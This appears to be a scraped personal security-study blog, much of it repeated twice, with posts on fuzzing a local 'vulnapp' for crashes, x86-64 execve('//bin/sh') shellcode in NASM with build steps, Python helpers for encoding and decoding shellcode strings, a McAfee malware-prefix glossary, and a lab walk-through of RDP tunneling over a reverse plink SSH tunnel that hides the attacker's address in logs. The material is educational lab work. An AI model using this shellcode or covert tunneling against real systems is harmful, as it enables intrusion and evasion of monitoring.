import os
for i in range(500,1000,1):
cmd = ("python -c \"print('A' * %d)\"" % i)
print("fuzzing length %d" % i)
os.system("%s | ./vulnapp" % cmd)
notes:
this is passing AAAAA where length is 500,501,502, ... all the way to 1000
and just looking to see when the program set faults, at which input length
Wednesday, March 11, 2020
Tuesday, March 10, 2020
shellcode in ASM to C program examples
not optimized for shortness
does not remove null (00) characters
--------
using data
--------
section .text
global _start
_start:
xor rdi, rdi ;null char to term string
push rdi
mov rdi, 0x68732f6e69622f2f ; //bin/sh
push rdi
mov rdi, rsp ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
--------
using push
--------
section .data
sh: db "//bin/sh"
section .text
global _start
_start:
mov rdi, sh ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root
does not remove null (00) characters
--------
using data
--------
section .text
global _start
_start:
xor rdi, rdi ;null char to term string
push rdi
mov rdi, 0x68732f6e69622f2f ; //bin/sh
push rdi
mov rdi, rsp ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
--------
using push
--------
section .data
sh: db "//bin/sh"
section .text
global _start
_start:
mov rdi, sh ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root
Convert String to Shell Code Hex in Python
if you want
//bin/sh
to become hex you can use in assembly for shell code
>>> for word in (re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode())):
... byte = re.findall(".{2}", word)
... cmd = ""
... for index in range(len(byte)-1,-1,-1):
... cmd = cmd + byte[index]
... print("push 0x%s" % cmd)
...
push 0x69622f2f
push 0x68732f6e
side notes
binascii.hexlify converts string to binary
re.findall(".{8}", finds the words
re.findall(".{2}" , finds the bytes
range(... ,... , -1) loops through the bytes in each word backwards (endianess)
cmd = cmd + ... rebuilds the hex in the correct order
//bin/sh
to become hex you can use in assembly for shell code
>>> for word in (re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode())):
... byte = re.findall(".{2}", word)
... cmd = ""
... for index in range(len(byte)-1,-1,-1):
... cmd = cmd + byte[index]
... print("push 0x%s" % cmd)
...
push 0x69622f2f
push 0x68732f6e
side notes
binascii.hexlify converts string to binary
re.findall(".{8}", finds the words
re.findall(".{2}" , finds the bytes
range(... ,... , -1) loops through the bytes in each word backwards (endianess)
cmd = cmd + ... rebuilds the hex in the correct order
Decode ShellCode String in Python
if you see this
push 0x68732f2f
push 0x6e69622f
it may be a string
you can use python 3 to decode and see
import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
'//sh'
>>> binascii.unhexlify("6e69622f").decode()[::-1]
'/bin'
yep! shellcode
//sh/bin
side note:
binascii.hexlify was used to convert the hex to a binary
decode() was used to convert the binary to a string
[::-1] was used to reverse the string's characters
push 0x68732f2f
push 0x6e69622f
it may be a string
you can use python 3 to decode and see
import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
'//sh'
>>> binascii.unhexlify("6e69622f").decode()[::-1]
'/bin'
yep! shellcode
//sh/bin
side note:
binascii.hexlify was used to convert the hex to a binary
decode() was used to convert the binary to a string
[::-1] was used to reverse the string's characters
Monday, February 24, 2020
McAfee Antivirus Malware Virus Type Names Prefixes
from here from 2017
http://download.nai.com/products/datfiles/4.x/nai/readme.txt
http://download.nai.com/products/datfiles/4.x/nai/readme.txt
A97M/ Macro virus that infects Microsoft
Access 97 files.
APM/ Macro virus or Trojan horse program
that infects Ami Pro document and
template files.
Bat/ Batch-file virus or Trojan horse
program. These viruses usually run
as batch or script files that
affect a particular program that
interprets the script or batch
commands they include. They are
very portable and can affect nearly
any platform that can run batch or
script files. The files themselves
often have a .bat extension.
CSC/ Corel Script virus or Trojan horse
program that infects Corel Draw
document files, template files, and
scripts.
IRC/ Internet Relay Chat script virus.
This virus type can use early
versions of the mIRC client
software to distribute a virus or
payload.
JS/ Script virus or Trojan horse
program written in JavaScript
language.
JV/ Potentially harmful Java
application or applet.
Linux/ Virus or Trojan horse program
compiled for Linux operating system
in ELF file format.
LWP/ Potentially harmful software for
Lotus WordPro.
MacHC/ Virus or Trojan horse program for
Apple Macintosh HyperCard scripting
language.
MacOS/ Virus or Trojan horse program for
Apple Macintosh OS versions 6-9.
MSIL/ Application written using Microsoft
Intermediate Language framework,
also known as .NET.
P98M/ Macro virus or Trojan horse program
that infects Microsoft Project
documents and templates.
PalmOS/ Virus or Trojan horse program for a
Palm Pilot.
PDF/ File-infector of Adobe PDF files.
Perl/ Script virus or Trojan horse
program written in Perl language.
PHP/ Script virus or Trojan horse
program written in PHP language.
PP97M/ Macro virus. Infects Microsoft
PowerPoint 97 files.
RDN/ Denoting the malware signature
was authored by McAfee Automation system.
SunOS/ Potentially harmful software for
Sun Solaris.
SWF/ Potentially harmful software for
Shockwave.
Unix/ Program or a shell script for a
version of UNIX.
V5M/ Macro or script virus, or
Trojan horse program that infects
Visio VBA (Visual Basic for
Applications) macros or scripts.
VBS/ Script virus or Trojan horse
program written in Visual Basic
Script language.
W16/ File-infector virus that runs in
16-bit Microsoft Windows
environments (Windows 3.1x).
W2K/ Potentially harmful software for
32-bit Microsoft Windows
environments, specifically Windows
NT, 2000, or XP.
W32/ File-infector or boot-sector virus
that runs in 32-bit Microsoft
Windows environments (Windows 95,
Windows 98, or Windows NT).
W95/ File-infector virus that runs in
Microsoft Windows 95, Windows 98,
and Windows ME environments.
W97M/ Macro virus that infects Microsoft
Word 97 files.
WHLP/ Potentially harmful software for
32-bit Microsoft Windows
environments that target Windows
HLP files.
WM/ Macro virus that infects Microsoft
Word 95 files.
X97M/ Macro virus that infects Microsoft
Excel 97 files.
XF/ Macro virus that infects Microsoft
Excel 95 or 97 via Excel formulas.
XM/ Macro virus that infects Microsoft
Excel 95 files.
AdClicker - Repeatedly accesses websites that
are funded by advertising.
Adware - Installs advertising software but
does not ask permission.
BackDoor - Provides remote access or control
through the Internet or network.
Dialer - Dials a phone number without
asking for permission.
DDoS - Operates as a Distributed Denial of
Service component.
Del - Deletes files.
Downloader - Downloads software from the
Internet, usually to deliver
backdoors, password stealers, and
sometimes viruses.
Exploit - Uses a vulnerability or a software
defect.
FDoS - Denotes a Flooding Denial of
Service component.
KeyLog - Logs keystrokes for immediate or
future transmission to the
attacker.
Kit - Denotes a program designed for
creating a virus or Trojan horse
program.
MultiDropper - Drops several Trojan horse programs
or viruses (often several different
‘backdoors’).
Nuke - Uses defects in software installed
on a remote computer to bring it down.
ProcKill - Terminates the processes of
anti-virus and security products.
May also delete files associated
with such applications.
PWS - Steals a password.
Reboot - Reboots the computer.
Reg - Modifies the Registry in an
undesirable fashion without asking
questions. For example, reduces the
security settings or creates
abnormal associations or sets.
Spam - Acts as a spamming tool.
Spyware - Monitors browsing habits or other
behavior and sends the information
out, often for unsolicited
advertising.
Uploader - Sends files or other data from the
computer.
Vtool - Denotes a program used by virus
writers or hackers for developing
software.
Zap - Wipes all or part of a hard disk.
Thursday, February 20, 2020
FireEye RDP Tunneling walk-through
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
setup 2 vms both set to "internal network" in oracle virtualbox
1 vm is windows 10
1 vm is kali linux
ensure they can ping eachother
setup in windows 10 vm
- download plink.exe from putty website
setup in kali linux vm
- edit /etc/ssh/sshd_config to allow root ssh (PermitRootLogin yes)
- restart or start ssh server (systemctl start ssh.service, systemctl restart ssh.service)
- check status of ssh to ensure it's running (systemctl status ssh)
steps to perform rdp tunneling
1.) on windows victim box
plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389
(note: this sets up an ssh tunnel from your windows victim box to your linux attacker box , note kaliLinuxIPAddress is replaced with the IP of your attacker box, and root is replaced with whatever account you want to ssh with ... you should see an ssh connection going from the windows box to the attacker box on port 22)
2.) then on the kali linux box
rdesktop -u VictimAccount 127.0.0.1:12345
or
xfreerdp /u:VictimAccount 127.0.0.1:12345
or
use remmina for RDP and connect to 127.0.0.1:12345 (this is what worked for me best on Windows 10, the others did not appear to be able to support the proper network authentication encryption)
(note: now you should be brought up a remote desktop session to the victim box from your attacker box, the interesting things is that you won't see any rdp traffic , only the already established ssh connection/tunnel on port 22, also on the victim box you won't see any traffic in the logs from the attacker box, you'll only see source ip of 127.0.0.1 on everything, such as in the remote desktop logs)
setup 2 vms both set to "internal network" in oracle virtualbox
1 vm is windows 10
1 vm is kali linux
ensure they can ping eachother
setup in windows 10 vm
- download plink.exe from putty website
setup in kali linux vm
- edit /etc/ssh/sshd_config to allow root ssh (PermitRootLogin yes)
- restart or start ssh server (systemctl start ssh.service, systemctl restart ssh.service)
- check status of ssh to ensure it's running (systemctl status ssh)
steps to perform rdp tunneling
1.) on windows victim box
plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389
(note: this sets up an ssh tunnel from your windows victim box to your linux attacker box , note kaliLinuxIPAddress is replaced with the IP of your attacker box, and root is replaced with whatever account you want to ssh with ... you should see an ssh connection going from the windows box to the attacker box on port 22)
2.) then on the kali linux box
rdesktop -u VictimAccount 127.0.0.1:12345
or
xfreerdp /u:VictimAccount 127.0.0.1:12345
or
use remmina for RDP and connect to 127.0.0.1:12345 (this is what worked for me best on Windows 10, the others did not appear to be able to support the proper network authentication encryption)
(note: now you should be brought up a remote desktop session to the victim box from your attacker box, the interesting things is that you won't see any rdp traffic , only the already established ssh connection/tunnel on port 22, also on the victim box you won't see any traffic in the logs from the attacker box, you'll only see source ip of 127.0.0.1 on everything, such as in the remote desktop logs)
Saturday, February 15, 2020
python pefile ctypes kernel32.dll examples
import pefile
import ctypes
kfile = pefile.PE(r'Kernel32.dll')
--- *** displays all exports such as *** ---
for export in kfile.DIRECTORY_ENTRY_EXPORT.symbols:
print(export.name)
--- *** get current working directory *** ---
s=ctypes.create_string_buffer(50)
k32.GetCurrentDirectoryA(len(s), s)
string = ""
for i in s:
if not i.decode() == "\x00":
string = string + i.decode()
import ctypes
kfile = pefile.PE(r'Kernel32.dll')
--- *** displays all exports such as *** ---
for export in kfile.DIRECTORY_ENTRY_EXPORT.symbols:
print(export.name)
--- *** executes a command like whoami *** ---
k32.WinExec(b'whoami')
--- *** creates a new folder *** ---
k32.CreateDirectoryW(r'c:\users\win10\testfolder', None)
--- *** prints length of a string *** ---
k32.lstrlenA(b'something')
--- *** start and stop a timer *** ---
start = k32.GetTickCount()
end = k32.GetTickCount()
elaspedTime = (end-start)/1000
--- *** get process id for the python.exe program running this code *** ---
k32.GetCurrentProcessId()
--- *** get current working directory *** ---
s=ctypes.create_string_buffer(50)
k32.GetCurrentDirectoryA(len(s), s)
string = ""
for i in s:
if not i.decode() == "\x00":
string = string + i.decode()
--- *** get environment variables APPDATA value *** --
s=ctypes.create_string_buffer(50)
k32.GetEnvironmentVariableA(b'APPDATA',s,len(s))
string = ""
for i in s:
if not i.decode() == "\x00":
string = string + i.decode()
s=ctypes.create_string_buffer(50)
k32.GetEnvironmentVariableA(b'APPDATA',s,len(s))
string = ""
for i in s:
if not i.decode() == "\x00":
string = string + i.decode()
Subscribe to:
Posts (Atom)